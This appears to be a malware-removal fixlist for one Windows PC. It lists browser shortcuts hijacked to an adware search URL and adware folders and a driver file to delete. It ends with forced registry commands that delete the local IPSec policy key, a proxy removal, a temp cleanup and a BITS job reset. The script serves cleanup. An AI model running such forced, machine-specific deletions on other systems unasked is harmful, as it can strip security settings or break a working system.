ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,"
ShortcutWithArgument: C:\Users\FAMILY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files\internet explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
C:\Users\FAMILY\AppData\Local\brsrv
C:\Program Files (x86)\YTDownloader
C:\Program Files (x86)\PremierOpinion
C:\Program Files\Common Files\ShopperPro3
C:\Users\FAMILY\AppData\Local\BrowserAir
C:\Program Files\Common Files\Goobzo
C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178
C:\Program Files (x86)\Common Files\219d5106-5a99-41fd-b942-db6b503b0178
C:\Program Files (x86)\Registry Helper
C:\Program Files (x86)\Search Web Know
C:\Program Files (x86)\Primary Color
C:\Program Files\WebBar
C:\Windows\System32\drivers\{bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64.sys
C:\Program Files (x86)\OneSystemCare
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers